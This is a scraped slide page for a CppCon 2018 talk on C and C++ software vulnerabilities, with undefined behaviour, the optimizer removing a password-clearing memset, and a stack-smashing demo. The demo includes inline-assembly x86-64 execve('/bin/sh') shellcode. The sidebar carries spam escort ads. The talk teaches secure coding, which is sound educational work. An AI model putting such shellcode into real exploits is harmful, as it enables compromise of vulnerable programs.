Fuzzing: Finding Your Own Bugs and 0days! 2.0
Fuzzing: Finding Your Own Bugs and 0days! 2.0Fuzzing: Finding Your Own Bugs and 0days! 2.0
Fuzzing: Finding Your Own Bugs and 0days! 2.0Rodolpho Concurde
 
A CTF Hackers Toolbox
A CTF Hackers ToolboxA CTF Hackers Toolbox
A CTF Hackers ToolboxStefan
 
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!NETWAYS
 
OWASP Poland Day 2018 - Pedro Fortuna - Are your Java Script based protection...
OWASP Poland Day 2018 - Pedro Fortuna - Are your Java Script based protection...OWASP Poland Day 2018 - Pedro Fortuna - Are your Java Script based protection...
OWASP Poland Day 2018 - Pedro Fortuna - Are your Java Script based protection...OWASP
 
Defcon 22-colby-moore-patrick-wardle-synack-drop cam
Defcon 22-colby-moore-patrick-wardle-synack-drop camDefcon 22-colby-moore-patrick-wardle-synack-drop cam
Defcon 22-colby-moore-patrick-wardle-synack-drop camPriyanka Aash
 
Test flawfinder. This program wont compile or run; thats not
Test flawfinder. This program wont compile or run; thats not Test flawfinder. This program wont compile or run; thats not
Test flawfinder. This program wont compile or run; thats notMoseStaton39
 
MongoDB Europe 2016 - Debugging MongoDB Performance
MongoDB Europe 2016 - Debugging MongoDB PerformanceMongoDB Europe 2016 - Debugging MongoDB Performance
MongoDB Europe 2016 - Debugging MongoDB PerformanceMongoDB
 
Davide Berardi - Linux hardening and security measures against Memory corruption
Davide Berardi - Linux hardening and security measures against Memory corruptionDavide Berardi - Linux hardening and security measures against Memory corruption
Davide Berardi - Linux hardening and security measures against Memory corruptionlinuxlab_conf
 

Similar to Software Vulnerabilities in C and C++ (CppCon 2018) (20)

printf("%s from %c to Z, in %d minutes!\n", "printf", 'A', 45);
printf("%s from %c to Z, in %d minutes!\n", "printf", 'A', 45);printf("%s from %c to Z, in %d minutes!\n", "printf", 'A', 45);
printf("%s from %c to Z, in %d minutes!\n", "printf", 'A', 45);
 
Secure Programming Practices in C++ (NDC Oslo 2018)
Secure Programming Practices in C++ (NDC Oslo 2018)Secure Programming Practices in C++ (NDC Oslo 2018)
Secure Programming Practices in C++ (NDC Oslo 2018)
 
Upping the APT hunting game: learn the best YARA practices from Kaspersky
Upping the APT hunting game: learn the best YARA practices from KasperskyUpping the APT hunting game: learn the best YARA practices from Kaspersky
Upping the APT hunting game: learn the best YARA practices from Kaspersky
 
C++ The Principles of Most Surprise
C++ The Principles of Most SurpriseC++ The Principles of Most Surprise
C++ The Principles of Most Surprise
 
04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)
 
Much ado about randomness. What is really a random number?
Much ado about randomness. What is really a random number?Much ado about randomness. What is really a random number?
Much ado about randomness. What is really a random number?
 
Driver Debugging Basics
Driver Debugging BasicsDriver Debugging Basics
Driver Debugging Basics
 
100 bugs in Open Source C/C++ projects
100 bugs in Open Source C/C++ projects 100 bugs in Open Source C/C++ projects
100 bugs in Open Source C/C++ projects
 
Virus lab
Virus labVirus lab
Virus lab
 
Introduction to Assembly Language
Introduction to Assembly LanguageIntroduction to Assembly Language
Introduction to Assembly Language
 
Fuzzing: Finding Your Own Bugs and 0days! 2.0
Fuzzing: Finding Your Own Bugs and 0days! 2.0Fuzzing: Finding Your Own Bugs and 0days! 2.0
Fuzzing: Finding Your Own Bugs and 0days! 2.0
 
A CTF Hackers Toolbox
A CTF Hackers ToolboxA CTF Hackers Toolbox
A CTF Hackers Toolbox
 
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!
 
Vagrant for real
Vagrant for realVagrant for real
Vagrant for real
 
OWASP Poland Day 2018 - Pedro Fortuna - Are your Java Script based protection...
OWASP Poland Day 2018 - Pedro Fortuna - Are your Java Script based protection...OWASP Poland Day 2018 - Pedro Fortuna - Are your Java Script based protection...
OWASP Poland Day 2018 - Pedro Fortuna - Are your Java Script based protection...
 
Defcon 22-colby-moore-patrick-wardle-synack-drop cam
Defcon 22-colby-moore-patrick-wardle-synack-drop camDefcon 22-colby-moore-patrick-wardle-synack-drop cam
Defcon 22-colby-moore-patrick-wardle-synack-drop cam
 
Test flawfinder. This program wont compile or run; thats not
Test flawfinder. This program wont compile or run; thats not Test flawfinder. This program wont compile or run; thats not
Test flawfinder. This program wont compile or run; thats not
 
Price of an Error
Price of an ErrorPrice of an Error
Price of an Error
 
MongoDB Europe 2016 - Debugging MongoDB Performance
MongoDB Europe 2016 - Debugging MongoDB PerformanceMongoDB Europe 2016 - Debugging MongoDB Performance
MongoDB Europe 2016 - Debugging MongoDB Performance
 
Davide Berardi - Linux hardening and security measures against Memory corruption
Davide Berardi - Linux hardening and security measures against Memory corruptionDavide Berardi - Linux hardening and security measures against Memory corruption
Davide Berardi - Linux hardening and security measures against Memory corruption
 

More from Patricia Aas

NDC TechTown 2023_ Return Oriented Programming an introduction.pdf
NDC TechTown 2023_ Return Oriented Programming an introduction.pdfNDC TechTown 2023_ Return Oriented Programming an introduction.pdf
NDC TechTown 2023_ Return Oriented Programming an introduction.pdfPatricia Aas
 
Return Oriented Programming, an introduction
Return Oriented Programming, an introductionReturn Oriented Programming, an introduction
Return Oriented Programming, an introductionPatricia Aas
 
I can't work like this (KDE Academy Keynote 2021)
I can't work like this (KDE Academy Keynote 2021)I can't work like this (KDE Academy Keynote 2021)
I can't work like this (KDE Academy Keynote 2021)Patricia Aas
 
Dependency Management in C++ (NDC TechTown 2021)
Dependency Management in C++ (NDC TechTown 2021)Dependency Management in C++ (NDC TechTown 2021)
Dependency Management in C++ (NDC TechTown 2021)Patricia Aas
 
Introduction to Memory Exploitation (Meeting C++ 2021)
Introduction to Memory Exploitation (Meeting C++ 2021)Introduction to Memory Exploitation (Meeting C++ 2021)
Introduction to Memory Exploitation (Meeting C++ 2021)Patricia Aas
 
Classic Vulnerabilities (MUCplusplus2022).pdf
Classic Vulnerabilities (MUCplusplus2022).pdfClassic Vulnerabilities (MUCplusplus2022).pdf
Classic Vulnerabilities (MUCplusplus2022).pdfPatricia Aas
 
Classic Vulnerabilities (ACCU Keynote 2022)
Classic Vulnerabilities (ACCU Keynote 2022)Classic Vulnerabilities (ACCU Keynote 2022)
Classic Vulnerabilities (ACCU Keynote 2022)Patricia Aas
 
Introduction to Memory Exploitation (CppEurope 2021)
Introduction to Memory Exploitation (CppEurope 2021)Introduction to Memory Exploitation (CppEurope 2021)
Introduction to Memory Exploitation (CppEurope 2021)Patricia Aas
 
Thoughts On Learning A New Programming Language
Thoughts On Learning A New Programming LanguageThoughts On Learning A New Programming Language
Thoughts On Learning A New Programming LanguagePatricia Aas
 
Trying to build an Open Source browser in 2020
Trying to build an Open Source browser in 2020Trying to build an Open Source browser in 2020
Trying to build an Open Source browser in 2020Patricia Aas
 
Trying to build an Open Source browser in 2020
Trying to build an Open Source browser in 2020Trying to build an Open Source browser in 2020
Trying to build an Open Source browser in 2020Patricia Aas
 
DevSecOps for Developers, How To Start (ETC 2020)
DevSecOps for Developers, How To Start (ETC 2020)DevSecOps for Developers, How To Start (ETC 2020)
DevSecOps for Developers, How To Start (ETC 2020)Patricia Aas
 
The Anatomy of an Exploit (NDC TechTown 2019)
The Anatomy of an Exploit (NDC TechTown 2019)The Anatomy of an Exploit (NDC TechTown 2019)
The Anatomy of an Exploit (NDC TechTown 2019)Patricia Aas
 
Elections: Trust and Critical Infrastructure (NDC TechTown 2019)
Elections: Trust and Critical Infrastructure (NDC TechTown 2019)Elections: Trust and Critical Infrastructure (NDC TechTown 2019)
Elections: Trust and Critical Infrastructure (NDC TechTown 2019)Patricia Aas
 
The Anatomy of an Exploit (NDC TechTown 2019))
The Anatomy of an Exploit (NDC TechTown 2019))The Anatomy of an Exploit (NDC TechTown 2019))
The Anatomy of an Exploit (NDC TechTown 2019))Patricia Aas
 
Elections, Trust and Critical Infrastructure (NDC TechTown)
Elections, Trust and Critical Infrastructure (NDC TechTown)Elections, Trust and Critical Infrastructure (NDC TechTown)
Elections, Trust and Critical Infrastructure (NDC TechTown)Patricia Aas
 
Survival Tips for Women in Tech (JavaZone 2019)
Survival Tips for Women in Tech (JavaZone 2019) Survival Tips for Women in Tech (JavaZone 2019)
Survival Tips for Women in Tech (JavaZone 2019) Patricia Aas
 
Embedded Ethics (EuroBSDcon 2019)
Embedded Ethics (EuroBSDcon 2019)Embedded Ethics (EuroBSDcon 2019)
Embedded Ethics (EuroBSDcon 2019)Patricia Aas
 
Chromium Sandbox on Linux (NDC Security 2019)
Chromium Sandbox on Linux (NDC Security 2019)Chromium Sandbox on Linux (NDC Security 2019)
Chromium Sandbox on Linux (NDC Security 2019)Patricia Aas
 

More from Patricia Aas (20)

NDC TechTown 2023_ Return Oriented Programming an introduction.pdf
NDC TechTown 2023_ Return Oriented Programming an introduction.pdfNDC TechTown 2023_ Return Oriented Programming an introduction.pdf
NDC TechTown 2023_ Return Oriented Programming an introduction.pdf
 
Telling a story
Telling a storyTelling a story
Telling a story
 
Return Oriented Programming, an introduction
Return Oriented Programming, an introductionReturn Oriented Programming, an introduction
Return Oriented Programming, an introduction
 
I can't work like this (KDE Academy Keynote 2021)
I can't work like this (KDE Academy Keynote 2021)I can't work like this (KDE Academy Keynote 2021)
I can't work like this (KDE Academy Keynote 2021)
 
Dependency Management in C++ (NDC TechTown 2021)
Dependency Management in C++ (NDC TechTown 2021)Dependency Management in C++ (NDC TechTown 2021)
Dependency Management in C++ (NDC TechTown 2021)
 
Introduction to Memory Exploitation (Meeting C++ 2021)
Introduction to Memory Exploitation (Meeting C++ 2021)Introduction to Memory Exploitation (Meeting C++ 2021)
Introduction to Memory Exploitation (Meeting C++ 2021)
 
Classic Vulnerabilities (MUCplusplus2022).pdf
Classic Vulnerabilities (MUCplusplus2022).pdfClassic Vulnerabilities (MUCplusplus2022).pdf
Classic Vulnerabilities (MUCplusplus2022).pdf
 
Classic Vulnerabilities (ACCU Keynote 2022)
Classic Vulnerabilities (ACCU Keynote 2022)Classic Vulnerabilities (ACCU Keynote 2022)
Classic Vulnerabilities (ACCU Keynote 2022)
 
Introduction to Memory Exploitation (CppEurope 2021)
Introduction to Memory Exploitation (CppEurope 2021)Introduction to Memory Exploitation (CppEurope 2021)
Introduction to Memory Exploitation (CppEurope 2021)
 
Thoughts On Learning A New Programming Language
Thoughts On Learning A New Programming LanguageThoughts On Learning A New Programming Language
Thoughts On Learning A New Programming Language
 
Trying to build an Open Source browser in 2020
Trying to build an Open Source browser in 2020Trying to build an Open Source browser in 2020
Trying to build an Open Source browser in 2020
 
Trying to build an Open Source browser in 2020
Trying to build an Open Source browser in 2020Trying to build an Open Source browser in 2020
Trying to build an Open Source browser in 2020
 
DevSecOps for Developers, How To Start (ETC 2020)
DevSecOps for Developers, How To Start (ETC 2020)DevSecOps for Developers, How To Start (ETC 2020)
DevSecOps for Developers, How To Start (ETC 2020)
 
The Anatomy of an Exploit (NDC TechTown 2019)
The Anatomy of an Exploit (NDC TechTown 2019)The Anatomy of an Exploit (NDC TechTown 2019)
The Anatomy of an Exploit (NDC TechTown 2019)
 
Elections: Trust and Critical Infrastructure (NDC TechTown 2019)
Elections: Trust and Critical Infrastructure (NDC TechTown 2019)Elections: Trust and Critical Infrastructure (NDC TechTown 2019)
Elections: Trust and Critical Infrastructure (NDC TechTown 2019)
 
The Anatomy of an Exploit (NDC TechTown 2019))
The Anatomy of an Exploit (NDC TechTown 2019))The Anatomy of an Exploit (NDC TechTown 2019))
The Anatomy of an Exploit (NDC TechTown 2019))
 
Elections, Trust and Critical Infrastructure (NDC TechTown)
Elections, Trust and Critical Infrastructure (NDC TechTown)Elections, Trust and Critical Infrastructure (NDC TechTown)
Elections, Trust and Critical Infrastructure (NDC TechTown)
 
Survival Tips for Women in Tech (JavaZone 2019)
Survival Tips for Women in Tech (JavaZone 2019) Survival Tips for Women in Tech (JavaZone 2019)
Survival Tips for Women in Tech (JavaZone 2019)
 
Embedded Ethics (EuroBSDcon 2019)
Embedded Ethics (EuroBSDcon 2019)Embedded Ethics (EuroBSDcon 2019)
Embedded Ethics (EuroBSDcon 2019)
 
Chromium Sandbox on Linux (NDC Security 2019)
Chromium Sandbox on Linux (NDC Security 2019)Chromium Sandbox on Linux (NDC Security 2019)
Chromium Sandbox on Linux (NDC Security 2019)
 

Recently uploaded

Unveiling Design Patterns: A Visual Guide with UML Diagrams
Unveiling Design Patterns: A Visual Guide with UML DiagramsUnveiling Design Patterns: A Visual Guide with UML Diagrams
Unveiling Design Patterns: A Visual Guide with UML DiagramsAhmed Mohamed
 
React Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief UtamaReact Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief UtamaHanief Utama
 
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024StefanoLambiase
 
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer DataAdobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer DataBradBedford3
 
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...stazi3110
 
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...gurkirankumar98700
 
chapter--4-software-project-planning.ppt
chapter--4-software-project-planning.pptchapter--4-software-project-planning.ppt
chapter--4-software-project-planning.pptkotipi9215
 
Intelligent Home Wi-Fi Solutions | ThinkPalm
Intelligent Home Wi-Fi Solutions | ThinkPalmIntelligent Home Wi-Fi Solutions | ThinkPalm
Intelligent Home Wi-Fi Solutions | ThinkPalmSujith Sukumaran
 
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...Christina Lin
 
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed DataAlluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed DataAlluxio, Inc.
 
Salesforce Certified Field Service Consultant
Salesforce Certified Field Service ConsultantSalesforce Certified Field Service Consultant
Salesforce Certified Field Service ConsultantAxelRicardoTrocheRiq
 
What is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need ItWhat is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need ItWave PLM
 
Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024Andreas Granig
 
Building Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop SlideBuilding Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop SlideChristina Lin
 
Implementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with AzureImplementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with AzureDinusha Kumarasiri
 
software engineering Chapter 5 System modeling.pptx
software engineering Chapter 5 System modeling.pptxsoftware engineering Chapter 5 System modeling.pptx
software engineering Chapter 5 System modeling.pptxnada99848
 
GOING AOT WITH GRAALVM – DEVOXX GREECE.pdf
GOING AOT WITH GRAALVM – DEVOXX GREECE.pdfGOING AOT WITH GRAALVM – DEVOXX GREECE.pdf
GOING AOT WITH GRAALVM – DEVOXX GREECE.pdfAlina Yurenko
 
Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)OPEN KNOWLEDGE GmbH
 

Recently uploaded (20)

Unveiling Design Patterns: A Visual Guide with UML Diagrams
Unveiling Design Patterns: A Visual Guide with UML DiagramsUnveiling Design Patterns: A Visual Guide with UML Diagrams
Unveiling Design Patterns: A Visual Guide with UML Diagrams
 
React Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief UtamaReact Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief Utama
 
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
 
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer DataAdobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
 
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
 
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
 
chapter--4-software-project-planning.ppt
chapter--4-software-project-planning.pptchapter--4-software-project-planning.ppt
chapter--4-software-project-planning.ppt
 
Intelligent Home Wi-Fi Solutions | ThinkPalm
Intelligent Home Wi-Fi Solutions | ThinkPalmIntelligent Home Wi-Fi Solutions | ThinkPalm
Intelligent Home Wi-Fi Solutions | ThinkPalm
 
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
 
Hot Sexy call girls in Patel Nagar🔝 9953056974 🔝 escort Service
Hot Sexy call girls in Patel Nagar🔝 9953056974 🔝 escort ServiceHot Sexy call girls in Patel Nagar🔝 9953056974 🔝 escort Service
Hot Sexy call girls in Patel Nagar🔝 9953056974 🔝 escort Service
 
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed DataAlluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
 
Salesforce Certified Field Service Consultant
Salesforce Certified Field Service ConsultantSalesforce Certified Field Service Consultant
Salesforce Certified Field Service Consultant
 
What is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need ItWhat is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need It
 
Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024
 
Building Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop SlideBuilding Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
 
Implementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with AzureImplementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with Azure
 
software engineering Chapter 5 System modeling.pptx
software engineering Chapter 5 System modeling.pptxsoftware engineering Chapter 5 System modeling.pptx
software engineering Chapter 5 System modeling.pptx
 
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
 
GOING AOT WITH GRAALVM – DEVOXX GREECE.pdf
GOING AOT WITH GRAALVM – DEVOXX GREECE.pdfGOING AOT WITH GRAALVM – DEVOXX GREECE.pdf
GOING AOT WITH GRAALVM – DEVOXX GREECE.pdf
 
Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)
 

Software Vulnerabilities in C and C++ (CppCon 2018)

  • 2. Software Vulnerabilities in C and C++ @pati_gallardo Patricia Aas CppCon 2018 T S
  • 3. Patricia Aas - Consultant T S C++ Programmer, Application Security Currently : T S Previously : Vivaldi, Cisco Systems, Knowit, Opera Software Master in Computer Science - main language Java Pronouns: she/her
  • 4. Undefined Behavior What specs exist? Compiler Optimizations Exploit Development 101 Exploitability Take your vitamins The Eight I'd Really Rather You Didn'ts @pati_gallardo
  • 6. undefined behavior “Examples of undefined behavior are memory accesses outside of array bounds, signed integer overflow, null pointer dereference, modification of the same scalar more than once in an expression without sequence points, access to an object through a pointer of a different type, etc. Compilers are not required to diagnose undefined behavior (although many simple situations are diagnosed), and the compiled program is not required to do anything meaningful.” http://en.cppreference.com/w/cpp/language/ub @pati_gallardo 6
  • 7. - Don’t reason about undefined behaviour - Assume that it crashes or is never executed - Changing compiler, compiler version or optimization level can break your application Undefined Behaviour
  • 8. Infinite Loop int main(void) { complex<int> delta; complex<int> mc[4] = {0}; for(int di = 0; di < 4; di++, delta = mc[di]) cout << di << endl; } (Thanks to @shafikyaghmour) https://stackoverflow.com/questions/32506643/c-compilation-bug Undefined Behavior: Access out of bounds @pati_gallardo 8
  • 9. Infinite Loop Want to give it a try? Compiler Explorer https://godbolt.org/g/TDjM8h Wandbox https://wandbox.org/permlink/aAFP2bMjA3um3L4K Github https://github.com/patricia-gallardo/insecure-coding-examples/ blob/master/vulnerable/infinite_loop.cpp @pati_gallardo (Thanks to @shafikyaghmour) https://stackoverflow.com/questions/32506643/c-compilation-bug9
  • 10. Undefined Behavior What specs exist? Compiler Optimizations Exploit Development 101 Exploitability Take your vitamins The Eight I'd Really Rather You Didn'ts @pati_gallardo
  • 12. CG: C++ Core Guidelines (328 pages!) @pati_gallardo
  • 13. SEI: CERT C++ Coding Standard (435 pages!) @pati_gallardo
  • 14. CWE : Common Weakness Enumeration (1572 pages!) @pati_gallardo
  • 15. Undefined Behavior What specs exist? Compiler Optimizations Exploit Development 101 Exploitability Take your vitamins The Eight I'd Really Rather You Didn'ts @pati_gallardo
  • 17. @pati_gallardo The Case Of The Disappearing Memset @pati_gallardo
  • 18. CWE-14: Compiler Removal of Code to Clear Buffers void GetData(char *MFAddr) { char pwd[64]; if (GetPasswordFromUser(pwd, sizeof(pwd))) { if (ConnectToMainframe(MFAddr, pwd)) { // Interaction with mainframe } } memset(pwd, 0, sizeof(pwd)); // <- Removed by the optimizer } SEI: MSC06-C. Beware of compiler optimizations SEI: MEM03-C. Clear sensitive information stored in reusable resources @pati_gallardo 18
  • 19. Want to give it a try? https://godbolt.org/g/FpEsht SEI: MSC06-C. Beware of compiler optimizations SEI: MEM03-C. Clear sensitive information stored in reusable resources @pati_gallardo 19 CWE-14: Compiler Removal of Code to Clear Buffers
  • 20. Memset_s : Zeroing Memory // Compliant Solution (C11) memset_s(pwd, 0, sizeof(pwd)); // Windows Solution SecureZeroMemory(pwd, sizeof(pwd)); SEI: MSC06-C. Beware of compiler optimizations SEI: MEM03-C. Clear sensitive information stored in reusable resources @pati_gallardo 20
  • 21. Undefined Behavior What specs exist? Compiler Optimizations Exploit Development 101 Exploitability Take your vitamins The Eight I'd Really Rather You Didn'ts @pati_gallardo
  • 23. Smashing The Stack For Fun And Profit Aleph One, Phrack Magazine issue 49 @pati_gallardo 23
  • 24. Stack Overflow Code: github.com/patricia-gallardo/insecure-coding-examples/ (directory: smashing) Thanks to #security on #include Discord, especially Vesim and hthh @pati_gallardo 24
  • 26. $
  • 27. Write C code for shellcode Compile it Put bytes in a char buffer Put jmp addr on ret addr @pati_gallardo 27 Write inline assembly, eliminating zero bytes
  • 28. Shellcode - code that gives you shell int execve( const char *filename, char *const argv[], char *const envp[]); @pati_gallardo Target Process Vulnerable Program Target Process /bin/sh Shellcode 28
  • 29. Shellcode - code that gives you shell int execve( const char *filename, char *const argv[], char *const envp[]); %rax : syscall number : 59 (x64) %rdi : const char *filename %rsi : const char *const argv[] %rdx : const char *const envp[] @pati_gallardo 29
  • 30. C code for our shellcode #include <unistd.h> int main(void) { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } @pati_gallardo 30
  • 31. Write C code for shellcode Compile it Put bytes in a char buffer Put jmp addr on ret addr @pati_gallardo Write inline assembly, eliminating zero bytes 31
  • 32. int main(void) { __asm__( "jmp push_stringnt" "pop_string: pop %rdint" … "push_string: call pop_stringnt" ".string "/bin/sh"nt" ); } @pati_gallardo 32
  • 33. Shellcode - code that gives you shell int execve( const char *filename, char *const argv[], char *const envp[]); %rax : syscall number : 59 (x64) %rdi : const char *filename %rsi : const char *const argv[] %rdx : const char *const envp[] @pati_gallardo 33
  • 34. 1. int main(void) { 2. __asm__( 3. "jmp push_stringnt" 4. "pop_string: pop %rdint" 5. "xor %rdx, %rdxnt" 6. "xor %rax, %raxnt" 7. "mov %rsp, %rsint" 8. "mov %rdx, 8(%rsp)nt" 9. "mov %rdi, (%rsp)nt" 10. "mov $0x3b, %alnt" 11. "syscallnt" 12. "push_string: call pop_stringnt" 13. ".string "/bin/sh"nt" 14. ); 15. } @pati_gallardo int execve( const char *filename, char *const argv[], char *const envp[]); %rax : syscall 59 %rdi : filename %rsi : argv[] %rdx : envp[] 34
  • 35. C code for our shellcode #include <unistd.h> int main(void) { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } @pati_gallardo 35
  • 36. 1. int main(void) { 2. __asm__( 3. "jmp push_stringnt" 4. "pop_string: pop %rdint" 5. "xor %rdx, %rdxnt" 6. "xor %rax, %raxnt" 7. "mov %rsp, %rsint" 8. "mov %rdx, 8(%rsp)nt" 9. "mov %rdi, (%rsp)nt" 10. "mov $0x3b, %alnt" 11. "syscallnt" 12. "push_string: call pop_stringnt" 13. ".string "/bin/sh"nt" 14. ); 15. } @pati_gallardo int execve( const char *filename, char *const argv[], char *const envp[]); %rax : syscall 59 %rdi : filename %rsi : argv[] %rdx : envp[] 36
  • 37. argv[0] (%rsp) /bin/sh argv[1] 8(%rsp) NULL %rax : syscall number (59 x64) %rdi : const char *filename %rsi : const char *const argv[] %rdx : const char *const envp[] %rdi /bin/sh %rdx 0 (NULL) %rax $0x3b (59, execve syscall #) %rsi %rsp Stack Registers 37
  • 38. 1. int main(void) { 2. __asm__( 3. "jmp push_stringnt" 4. "pop_string: pop %rdint" 5. "xor %rdx, %rdxnt" 6. "xor %rax, %raxnt" 7. "mov %rsp, %rsint" 8. "mov %rdx, 8(%rsp)nt" 9. "mov %rdi, (%rsp)nt" 10. "mov $0x3b, %alnt" 11. "syscallnt" 12. "push_string: call pop_stringnt" 13. ".string "/bin/sh"nt" 14. ); 15. } @pati_gallardo int execve( const char *filename, char *const argv[], char *const envp[]); %rax : syscall 59 %rdi : filename %rsi : argv[] %rdx : envp[] 38
  • 39. Shellcode - code that gives you shell int execve( const char *filename, char *const argv[], char *const envp[]); @pati_gallardo Target Process Vulnerable Program Target Process /bin/sh Shellcode 39
  • 40. $
  • 41. Write C code for shellcode Compile it Put bytes in a char buffer Put jmp addr on ret addr @pati_gallardo Write inline assembly, eliminating zero bytes 41
  • 42. $ objdump -d shellcodeasm | grep main -C 20
